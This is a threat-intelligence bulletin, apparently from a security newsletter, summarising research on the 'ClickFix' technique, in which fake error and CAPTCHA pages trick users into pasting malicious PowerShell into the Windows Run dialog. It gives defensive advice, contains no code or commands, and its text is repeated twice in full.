ClickFix Tactic: The Phantom Meet
Summary:
Researchers at Sekoia have shed light on a new social engineering tactic called ClickFix, which involves displaying fake error messages in web browsers to trick users into copying and executing malicious PowerShell code to infect targeted systems. In the last couple of months, ClickFix has been used to distribute Windows and macOS infostealers, botnets, and remote access tools. Several sites have been set up by actors impersonating Google Meet, Google Chrome, Facebook, PDFSimpli, and reCAPTCHA, using this tactic. All of these sites require the victim to click on a button to either verify that they are human or to fix an error with the webpage. After clicking on the button, the victim is prompted to open the run command and press “Ctrl + V.” Given that the buttons are programmed to automatically copy PowerShell code to the victim’s clipboard once clicked on, by pressing “Ctrl + V” on the keyboard, the victim unknowingly pastes the PowerShell code into the run command prompt, enabling it to be successfully executed.
Security Officer Comments:
ProofPoint researchers initially uncovered this ClickFix tactic being leveraged by initial access brokers like TA571 in email phishing campaigns since March 2024. These campaigns employ HTML files disguised as Word documents, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate, or NetSupport RAT via a PowerShell script. More recently, this tactic has been used to propagate malware via compromised websites and distribution infrastructures. Given that this tactic deceives users into downloading and running malware on their systems without involving a direct web browser download or manual file execution, this makes it possible for actors to bypass web browser security features like Google Safe Browsing.
Suggested Corrections:
Users should take caution when coming across websites that ask them to execute commands through the Run command prompt. No legitimate website is going to ask a user to execute PowerShell code to verify whether they are a human or to fix an issue. As such, it’s best for users to avoid copying and pasting unknown commands from untrusted sources, especially on the system command prompt. Having systems up to date and installing antivirus solutions can also be beneficial in detecting and preventing various malware strains from being executed via these malicious commands.
IOCs can be found here.
Link(s):
https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
Researchers at Sekoia have shed light on a new social engineering tactic called ClickFix, which involves displaying fake error messages in web browsers to trick users into copying and executing malicious PowerShell code to infect targeted systems. In the last couple of months, ClickFix has been used to distribute Windows and macOS infostealers, botnets, and remote access tools. Several sites have been set up by actors impersonating Google Meet, Google Chrome, Facebook, PDFSimpli, and reCAPTCHA, using this tactic. All of these sites require the victim to click on a button to either verify that they are human or to fix an error with the webpage. After clicking on the button, the victim is prompted to open the run command and press “Ctrl + V.” Given that the buttons are programmed to automatically copy PowerShell code to the victim’s clipboard once clicked on, by pressing “Ctrl + V” on the keyboard, the victim unknowingly pastes the PowerShell code into the run command prompt, enabling it to be successfully executed.
Security Officer Comments:
ProofPoint researchers initially uncovered this ClickFix tactic being leveraged by initial access brokers like TA571 in email phishing campaigns since March 2024. These campaigns employ HTML files disguised as Word documents, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate, or NetSupport RAT via a PowerShell script. More recently, this tactic has been used to propagate malware via compromised websites and distribution infrastructures. Given that this tactic deceives users into downloading and running malware on their systems without involving a direct web browser download or manual file execution, this makes it possible for actors to bypass web browser security features like Google Safe Browsing.
Suggested Corrections:
Users should take caution when coming across websites that ask them to execute commands through the Run command prompt. No legitimate website is going to ask a user to execute PowerShell code to verify whether they are a human or to fix an issue. As such, it’s best for users to avoid copying and pasting unknown commands from untrusted sources, especially on the system command prompt. Having systems up to date and installing antivirus solutions can also be beneficial in detecting and preventing various malware strains from being executed via these malicious commands.
IOCs can be found here.
Link(s):
https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/